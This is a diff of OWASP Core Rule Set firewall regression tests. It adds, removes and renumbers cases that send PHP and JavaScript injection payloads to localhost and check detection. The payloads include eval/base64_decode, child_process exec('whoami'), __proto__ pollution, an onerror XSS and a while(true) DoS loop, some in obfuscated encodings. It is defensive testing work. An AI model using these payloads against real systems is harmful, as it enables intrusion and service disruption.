+    desc: non-dangerous PHP functions, removed to reduce FP
     stages:
       - stage:
           input:
@@ -100,3 +100,35 @@ tests:
             uri: /array_diff%20foo%20%28
           output:
             no_log_contains: \( found within
+  - test_title: 933151-7
+    desc: "snippets of Eng words (like prev) should not be matched, requiring regex match with word boundaries (e.g. 933160)"
+    stages:
+      - stage:
+          input:
+            data: x=dummydata
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?a=preview
+          output:
+            no_log_contains: id "933151"
+  - test_title: 933151-8
+    desc: "snippets of Eng words (like exp) should not be matched, requiring regex match with word boundaries (e.g. 933160)"
+    stages:
+      - stage:
+          input:
+            data: x=dummydata
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: POST
+            port: 80
+            uri: /?a=exploration
+          output:
+            no_log_contains: id "933151"
diff --git a/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
index 255c6fd..71a0ef3 100644
--- a/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
+++ b/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml
@@ -22,22 +22,6 @@ tests:
           output:
             log_contains: id "933160"
   - test_title: 933160-2
-    desc: function call regexp
-    stages:
-      - stage:
-          input:
-            data: foo=curl_iNit%28%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-3
     desc: function call regexp
     stages:
       - stage:
@@ -53,7 +37,7 @@ tests:
             uri: /
           output:
             log_contains: id "933160"
-  - test_title: 933160-4
+  - test_title: 933160-3
     desc: function call regexp
     stages:
       - stage:
@@ -69,7 +53,7 @@ tests:
             uri: /
           output:
             log_contains: id "933160"
-  - test_title: 933160-5
+  - test_title: 933160-4
     desc: function call regexp
     stages:
       - stage:
@@ -85,7 +69,7 @@ tests:
             uri: /?foo=exec%0A%28%27bar%27%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-6
+  - test_title: 933160-5
     desc: function call regexp
     stages:
       - stage:
@@ -101,7 +85,7 @@ tests:
             uri: /?foo=FILE%0D%0A%28%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-7
+  - test_title: 933160-6
     desc: function call regexp
     stages:
       - stage:
@@ -117,7 +101,7 @@ tests:
             uri: /?foo=file_ExistS%20%28%0A%0A%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-8
+  - test_title: 933160-7
     desc: function call regexp
     stages:
       - stage:
@@ -133,7 +117,7 @@ tests:
             uri: /?foo=fopen%20%20%28blah%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-9
+  - test_title: 933160-8
     desc: '@ operator'
     stages:
       - stage:
@@ -149,7 +133,7 @@ tests:
             uri: /?foo=fopen%20%20%28blah%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-10
+  - test_title: 933160-9
     desc: func\t()
     stages:
       - stage:
@@ -165,7 +149,7 @@ tests:
             uri: /?foo=fopen%20%20%28blah%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-11
+  - test_title: 933160-10
     desc: func//comment\r\n ()
     stages:
       - stage:
@@ -181,7 +165,7 @@ tests:
             uri: /?foo=fopen%20%20%28blah%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-12
+  - test_title: 933160-11
     desc: 'func #comment\n ()'
     stages:
       - stage:
@@ -197,7 +181,7 @@ tests:
             uri: /?foo=fopen%20%20%28blah%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-13
+  - test_title: 933160-12
     desc: func#\n ()
     stages:
       - stage:
@@ -213,7 +197,7 @@ tests:
             uri: /?foo=fopen%20%20%28blah%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-14
+  - test_title: 933160-13
     desc: 'func \t #\n ()'
     stages:
       - stage:
@@ -229,7 +213,7 @@ tests:
             uri: /?foo=fopen%20%20%28blah%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-15
+  - test_title: 933160-14
     desc: func/*comment*/()
     stages:
       - stage:
@@ -245,7 +229,7 @@ tests:
             uri: /?foo=fopen%20%20%28blah%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-16
+  - test_title: 933160-15
     desc: func /*com*/ ()
     stages:
       - stage:
@@ -261,7 +245,7 @@ tests:
             uri: /?foo=fopen%20%20%28blah%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-17
+  - test_title: 933160-16
     desc: func \t/**/\t ()
     stages:
       - stage:
@@ -277,7 +261,7 @@ tests:
             uri: /?foo=fopen%20%20%28blah%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-18
+  - test_title: 933160-17
     desc: func\t/*foo\r\nbar*/\t (
     stages:
       - stage:
@@ -293,7 +277,7 @@ tests:
             uri: /?foo=fopen%20%20%28blah%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-19
+  - test_title: 933160-18
     desc: func\t/*foo\r\nbar*/\t (
     stages:
       - stage:
@@ -309,7 +293,7 @@ tests:
             uri: /strrev()
           output:
             log_contains: id "933160"
-  - test_title: 933160-20
+  - test_title: 933160-19
     desc: func\t/*foo\r\nbar*/\t (
     stages:
       - stage:
@@ -325,7 +309,7 @@ tests:
             uri: /strREV%28%24x%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-21
+  - test_title: 933160-20
     desc: func\t/*foo\r\nbar*/\t (
     stages:
       - stage:
@@ -341,7 +325,7 @@ tests:
             uri: /?x=eval%28chr%28112%29.chr%28104%29.chr%28112%29
           output:
             log_contains: id "933160"
-  - test_title: 933160-22
+  - test_title: 933160-21
     desc: func\t/*foo\r\nbar*/\t (
     stages:
       - stage:
@@ -357,7 +341,7 @@ tests:
             uri: /eval(gzinflate(str_rot13(base64_decode("")
           output:
             log_contains: id "933160"
-  - test_title: 933160-23
+  - test_title: 933160-22
     desc: func\t/*foo\r\nbar*/\t (
     stages:
       - stage:
@@ -373,7 +357,7 @@ tests:
             uri: /eval%28base64_decode%28%27JGNoZWNrID...
           output:
             log_contains: id "933160"
-  - test_title: 933160-24
+  - test_title: 933160-23
     desc: func\t/*foo\r\nbar*/\t (
     stages:
       - stage:
@@ -389,247 +373,7 @@ tests:
             uri: /
           output:
             log_contains: id "933160"
-  - test_title: 933160-25
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: posix_getegid%28%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /getegid
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-26
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /print_r
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-27
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /astrrev()
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-28
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /strrev
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-29
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /strrev(
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-30
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /?foo=eval
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-31
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /?foo=the%20files%20%28yep%29
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-32
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /?foo=exec%20%28
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-33
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /?foo=executor%28%29
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-34
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /?foo=cheval%28%24foo%29
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-35
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /?foo=audi%6ffile%28%24foo%29
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-36
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /?foo=the%20system%20is%20down%28%29
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-37
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /?foo=ecosystem%28%29
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-38
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /?foo=systems%28%29
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-39
-    desc: func\t/*foo\r\nbar*/\t (
-    stages:
-      - stage:
-          input:
-            data: x=Print_r%28%20%29
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /?foo=system%20something%28%29
-          output:
-            log_contains: id "933160"
-  - test_title: 933160-40
+  - test_title: 933160-24
     desc: string function call
     stages:
       - stage:
@@ -644,7 +388,7 @@ tests:
             uri: /?foo=return%22system%22%28xyz%29.s
           output:
             log_contains: id "933160"
-  - test_title: 933160-41
+  - test_title: 933160-25
     desc: system - whoami in braces
     stages:
       - stage:
@@ -660,7 +404,7 @@ tests:
             uri: /
           output:
             log_contains: id "933160"
-  - test_title: 933160-42
+  - test_title: 933160-26
     desc: system in braces - whoami in parentheses
     stages:
       - stage:
@@ -676,7 +420,7 @@ tests:
             uri: /
           output:
             log_contains: id "933160"
-  - test_title: 933160-43
+  - test_title: 933160-27
     desc: system call in single quotes and parentheses - whoami command in single quotes and parentheses
     stages:
       - stage:
@@ -692,7 +436,7 @@ tests:
             uri: /
           output:
             log_contains: id "933160"
-  - test_title: 933160-44
+  - test_title: 933160-28
     desc: system call in double quotes and parentheses - whoami command in double quotes and parentheses
     stages:
       - stage:
diff --git a/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml b/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml
index f08477d..bc41bc5 100644
--- a/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml
+++ b/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933161.yaml
@@ -50,27 +50,28 @@ tests:
               Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
             method: POST
             port: 80
-            uri: /?foo=chroot%09%28%29
-          output:
-            log_contains: id "933161"
-  - test_title: 933161-4
-    desc: dl/*foo*/()
-    stages:
-      - stage:
-          input:
-            data: gethostbynamE(
-            dest_addr: 127.0.0.1
-            headers:
-              Host: localhost
-              User-Agent: "OWASP CRS test agent"
-              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-            method: POST
-            port: 80
-            uri: /?foo=chroot%09%28%29
+            uri: /?foo=symlink%09%28%29
           output:
             log_contains: id "933161"
+  # See https://github.com/coreruleset/coreruleset/pull/3273#issuecomment-1675490075
+  # - test_title: 933161-4
+  #   desc: dl/*foo*/()
+  #   stages:
+  #     - stage:
+  #         input:
+  #           data: gethostbynamE(
+  #           dest_addr: 127.0.0.1
+  #           headers:
+  #             Host: localhost
+  #             User-Agent: "OWASP CRS test agent"
+  #             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+  #           method: POST
+  #           port: 80
+  #           uri: /?foo=dl%2F%2Afoo%2A%2F%09%28%29
+  #         output:
+  #           log_contains: id "933161"
   - test_title: 933161-5
-    desc: dl/*foo*/()
+    desc: ucfirst()
     stages:
       - stage:
           input:
diff --git a/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml b/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml
index 5ca358d..26d3d44 100644
--- a/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml
+++ b/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml
@@ -85,3 +85,88 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "934101"
+  - test_title: 934101-6
+    desc: "Detect example payload require(... submitted as plaintext"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=require("child_process").exec('whoami')
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934101"
+  - test_title: 934101-7
+    desc: "Detect example payload require(... submitted as plaintext with JavaScript escape sequence obfuscation"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=\u0072\u0065quire("child_process").exec('whoami')
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934101"
+  - test_title: 934101-8
+    desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=cmVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg==
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934101"
+  - test_title: 934101-9
+    desc: "Detect example payload require(... submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=XHUwMDcyXHUwMDY1cXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCd3aG9hbWknKQo=
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934101"
+  - test_title: 934101-10
+    desc: "Detect example payload require(... submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=\u0063\u006dVxdWlyZSgiY2hpbGRfcHJvY2VzcyIpLmV4ZWMoJ3dob2FtaScpCg==
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934101"
diff --git a/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml b/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml
index a9319e7..3111d52 100644
--- a/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml
+++ b/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml
@@ -184,3 +184,88 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "934130"
+  - test_title: 934130-12
+    desc: "Detect example payload __proto__... submitted as plaintext"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=__proto__.foo=bar
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934130"
+  - test_title: 934130-13
+    desc: "Detect example payload __proto__... submitted as plaintext with JavaScript escape sequence obfuscation"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=__\u0070\u0072oto__.foo=bar
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934130"
+  - test_title: 934130-14
+    desc: "Detect example payload __proto__... submitted as plaintext that has been Base64 encoded"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=X19wcm90b19fLmZvbz1iYXIK
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934130"
+  - test_title: 934130-15
+    desc: "Detect example payload __proto__... submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=X19cdTAwNzBcdTAwNzJvdG9fXy5mb289YmFyCg==
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934130"
+  - test_title: 934130-16
+    desc: "Detect example payload __proto__... submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=\u0058\u00319wcm90b19fLmZvbz1iYXIK
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934130"
diff --git a/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934131.yaml b/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934131.yaml
index d699386..92ddc5e 100644
--- a/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934131.yaml
+++ b/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934131.yaml
@@ -37,3 +37,88 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "934131"
+  - test_title: 934131-3
+    desc: "Detect example payload [constructor]... submitted as plaintext"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=x[constructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)>
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934131"
+  - test_title: 934131-4
+    desc: "Detect example payload [constructor]... submitted as plaintext with JavaScript escape sequence obfuscation"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=x[\u0063\u006Fnstructor][__parseStyleElement][innerHTML]=<img/src/onerror%3dalert(1)>
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934131"
+  - test_title: 934131-5
+    desc: "Detect example payload [constructor]... submitted as plaintext that has been Base64 encoded"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=eFtjb25zdHJ1Y3Rvcl1bX19wYXJzZVN0eWxlRWxlbWVudF1baW5uZXJIVE1MXT08aW1nL3NyYy9vbmVycm9yJTNkYWxlcnQoMSk+Cg==
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934131"
+  - test_title: 934131-6
+    desc: "Detect example payload [constructor]... submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=eFtcdTAwNjNcdTAwNkZuc3RydWN0b3JdW19fcGFyc2VTdHlsZUVsZW1lbnRdW2lubmVySFRNTF09PGltZy9zcmMvb25lcnJvciUzZGFsZXJ0KDEpPgo=
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934131"
+  - test_title: 934131-7
+    desc: "Detect example payload [constructor]... submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+              Cookie: test_cookie=\u0065\u0046tjb25zdHJ1Y3Rvcl1bX19wYXJzZVN0eWxlRWxlbWVudF1baW5uZXJIVE1MXT08aW1nL3NyYy9vbmVycm9yJTNkYWxlcnQoMSk+Cg==
+            method: GET
+            port: 80
+            uri: "/get"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934131"
diff --git a/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml b/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml
index e720593..b94400f 100644
--- a/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml
+++ b/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml
@@ -453,3 +453,83 @@ tests:
             version: HTTP/1.0
           output:
             log_contains: id "934160"
+  - test_title: 934160-29
+    desc: "Detect example DoS loop while(true) submitted as plaintext"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: GET
+            port: 80
+            uri: "/get?eval=while(true);"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934160"
+  - test_title: 934160-30
+    desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: GET
+            port: 80
+            uri: "/get?eval=\u0077\u0068ile(true);"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934160"
+  - test_title: 934160-31
+    desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: GET
+            port: 80
+            uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934160"
+  - test_title: 934160-32
+    desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
+              User-Agent: "OWASP CRS test agent"
+              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+            method: GET
+            port: 80
+            uri: "/get?eval=XHUwMDc3XHUwMDY4aWxlKHRydWUpOwo%3D"
+            version: HTTP/1.1
+          output:
+            log_contains: id "934160"
+  - test_title: 934160-33
+    desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences"
+    stages:
+      - stage:
+          input:
+            dest_addr: 127.0.0.1
+            headers:
+              Host: localhost
